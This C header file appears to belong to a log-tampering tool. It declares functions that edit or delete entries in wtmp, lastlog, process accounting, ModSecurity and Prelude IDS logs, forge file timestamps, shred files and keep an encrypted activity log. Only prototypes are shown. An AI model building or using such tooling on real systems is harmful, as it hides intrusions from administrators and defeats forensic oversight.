 #define DEFAULT_REPLACE "localhost"

/* removeLogs:*/
#define BUFFER             2048  /* buffer for each line */
#define TIMEBUFFER         255   /* buffer for time string */
#define BUFFER_FOR_LINES   128   /* how many lines are buffered */

/* wipe */
#define WIPE_GUTMANN    1	/* wipe gutman mode */
#define WIPE_MILITARY   2	/* wipe military mode */
#define WIPE_BOTH       3	/* wipe first gutman, then military mode */

/* copy */
#define CP_BUFFER 4096		/* buffer for copy */

/* log_it */
#define LOGBUFFER 1024		/* buffer for logging */


/* clear logs */
int wtmpLogs(const char *file,
             const char *to_file, 
             const char *string,
             const char *replace,
             const char *user,
             const char *host, 
             int verbose, 
             const char *logfile,
             const char *key);

int clearLastlog(const char *file,
                 const char *to_file, 
                 const char *string,
                 const char *replace,
                 const char *user,
                 time_t change_time,
                 int verbose, 
                 const char *logfile,
                 const char *key);

int clearAcct(const char *file,
              const char *to_file, 
              const char *replace,
              const char *cmd,
              const char *user,
              const char *tty,
              int clear_core,         
              int verbose, 
              const char *logfile,
              const char *key);

int replace_in_file(const char *file, 
                    const char *to_file, 
                    const char *string, 
                    const char *replace, 
                    int verbose, 
                    const char *logfile,
                    const char *key ) ;

int remove_logs(const char *file, 
                const char *to_file, 
                const char *string, 
                int verbose, 
                const char *logfile,
                const char *key );

int remove_lines(const char *file,
                const char *to_file,
                const char *string,
                int    verbose,
                const char *logfile,
                const char *key);

int remove_logs_mod_sec(const char *file, 
                const char *to_file, 
                const char *string, 
                int    verbose, 
                const char *logfile,
                const char *key);

int remove_logs_prelude_logs(const char *file, 
                const char *to_file, 
                const char *string, 
                int    verbose, 
                const char *logfile,
                const char *key);

int remove_logs_prelude_xml(const char *file, 
                const char *to_file, 
                const char *string, 
                int    verbose, 
                const char *logfile,
                const char *key);

int remove_logs_prelude_logs(const char *file, 
                const char *to_file, 
                const char *string, 
                int    verbose, 
                const char *logfile,
                const char *key);

int remove_logs_prelude_logs(const char *file, 
                const char *to_file, 
                const char *string, 
                int    verbose, 
                const char *logfile,
                const char *key);

int remove_manual_edit(const char *file, const char *to_file, int verbose);


/* touch */
time_t char2time(const char *s);
int change_ctime(const char *file, const struct timeval *ctime, struct stat *inode);
int set_time(const char *file, struct stat *perm);
int touch3(const char *orgfile, const char *changefile);

/* wipe */
int shred(char *file, int verbose, int mode);
int wipe(char *file, int verbose);

/* copy */
int writeBack(char *from,  char *to, int verbose);

/* log it */
int log_it(const char *file, const char *format, ...);
int crypt_log_it(const char *file, const char *key, const char *format, ...) ;

/* crypt */
char *crypt_it(const char *key, const char *text);
char *decrypt_it(const char *key, const char *ctext);

/* replace strings */
char *replace_text_plain(const char *source, const char *string, const char *replace);
char *do_replace_text_plain(char *source, const char *string, const char *replace, int *counter);
